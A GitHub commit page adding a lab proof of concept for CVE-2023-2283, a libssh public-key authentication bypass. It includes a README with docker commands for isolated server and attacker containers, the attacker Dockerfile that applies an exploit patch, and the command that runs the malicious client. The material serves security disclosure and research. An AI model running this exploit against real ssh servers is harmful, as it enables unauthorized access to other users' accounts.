-
Notifications
You must be signed in to change notification settings - Fork 248
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Browse files
Browse the repository at this point in the history
…VE-2023-2283 PoC for libssh CVE-2023-2283
- Loading branch information
Showing
13 changed files
with
606 additions
and
0 deletions.
There are no files selected for viewing
104 changes: 104 additions & 0 deletions
104
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,104 @@ | ||
# Public key authentication bypass in libssh (CVE-2023-2283) | ||
|
||
[CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/) | ||
is an authentication bypass vulnerability in | ||
[libssh](https://www.libssh.org/), which, under certain conditions, may | ||
enable a remote attacker to gain unauthorized access to another user’s | ||
account via ssh login. | ||
|
||
This demo uses docker to simulate two computers, named "libssh-server" | ||
and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`, | ||
which is a simple ssh server application that is [included as an | ||
example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c) | ||
with the libssh source code. The server is configured to allow public | ||
key authentication with an ED25519 key, but the attacker does not know the | ||
private key. The attacker instead authenticates by triggering the vulnerability. | ||
|
||
The vulnerability is triggered when `ssh_server_pthread` hits an | ||
out-of-memory condition at precisely the right moment. If libssh is | ||
running on a 64-bit server with plenty of RAM then it is very unlikely | ||
that an attacker will be able to generate enough memory pressure to | ||
cause an out-of-memory error, which means that the vulnerability is | ||
unlikely to be exploitable. The goal of this demo is, instead, to show | ||
that the vulnerability is exploitable if libssh is running in a | ||
memory-constrained environment such as a [memory-constrained | ||
container](https://docs.docker.com/config/containers/resource_constraints/), | ||
which we believe is a realistic scenario for a real-life libssh deployment. | ||
The demo uses `ulimit` to set a 256MB memory limit on the ssh server. | ||
|
||
## Network setup | ||
|
||
Create a docker network bridge, to simulate a network with two separate computers. | ||
|
||
``` | ||
docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network | ||
``` | ||
|
||
## Server setup | ||
|
||
Build the docker image: | ||
|
||
``` | ||
docker build server -t libssh-server --build-arg UID=`id -u` | ||
``` | ||
|
||
Start the container: | ||
|
||
``` | ||
docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server | ||
``` | ||
|
||
If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments: | ||
|
||
``` | ||
docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server | ||
``` | ||
|
||
Inside the container, run these commands to create ssh keys for the server: | ||
|
||
``` | ||
mkdir ~/testkeys | ||
ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa | ||
ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa | ||
``` | ||
|
||
Start the server: | ||
|
||
``` | ||
ulimit -v 262144 # 256MB | ||
~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 | ||
``` | ||
|
||
Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x". | ||
|
||
## Attacker setup | ||
|
||
Build the docker image: | ||
|
||
``` | ||
docker build attacker -t libssh-attacker --build-arg UID=`id -u` | ||
``` | ||
|
||
Start the container: | ||
|
||
``` | ||
docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker | ||
``` | ||
|
||
If you want to be able to debug the client, then you need to start the container with some extra command line arguments: | ||
|
||
``` | ||
docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker | ||
``` | ||
|
||
The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step. | ||
|
||
Run the malicious client like this: | ||
|
||
``` | ||
~/libssh/build/examples/ssh-client -p 2022 [email protected] ~/id_ed25519.pub | ||
``` | ||
|
||
The vulnerability is triggered when the ssh server has an out-of-memory error at the exact right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instance of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start 3 instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop. | ||
|
||
Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process. |
35 changes: 35 additions & 0 deletions
35
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
FROM ubuntu:22.04 | ||
|
||
ENV DEBIAN_FRONTEND=noninteractive | ||
|
||
RUN apt-get update && \ | ||
apt-get install -y \ | ||
sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ | ||
libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg | ||
|
||
ARG UID=1000 | ||
|
||
# Create a non-root user account to run libssh. | ||
RUN adduser attacker --disabled-password --uid $UID | ||
|
||
# Grant the 'attacker' user sudo access. This is not used for the demo, | ||
# but it is often handy for installing extra packages. | ||
RUN adduser attacker sudo | ||
RUN echo "attacker:x" | chpasswd | ||
COPY home/ /home/attacker/ | ||
RUN chown -R attacker:attacker /home/attacker | ||
|
||
# Switch over to the 'attacker' user, since root access is no longer required | ||
USER attacker | ||
WORKDIR /home/attacker | ||
|
||
# Clone and build libssh v0.10.4 | ||
RUN git clone https://git.libssh.org/projects/libssh.git && \ | ||
cd libssh && \ | ||
git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ | ||
git apply ~/diff.txt && \ | ||
mkdir build && cd build && \ | ||
cmake .. && \ | ||
make -j $(nproc) | ||
|
||
USER attacker |
1 change: 1 addition & 0 deletions
1
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
~/libssh/build/examples/ssh-client -p 2022 [email protected] ~/id_ed25519.pub |
11 changes: 11 additions & 0 deletions
11
SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
# Enable 256 colors | ||
set -g default-terminal "screen-256color" | ||
|
||
# Enable using the mouse to switch windows. | ||
set -g mouse on | ||
|
||
# Don't lose track of SSH_AGENT etc. from parent environment. | ||
set -g update-environment -r | ||
|
||
# history buffer size | ||
set-option -g history-limit 100000 |
Oops, something went wrong.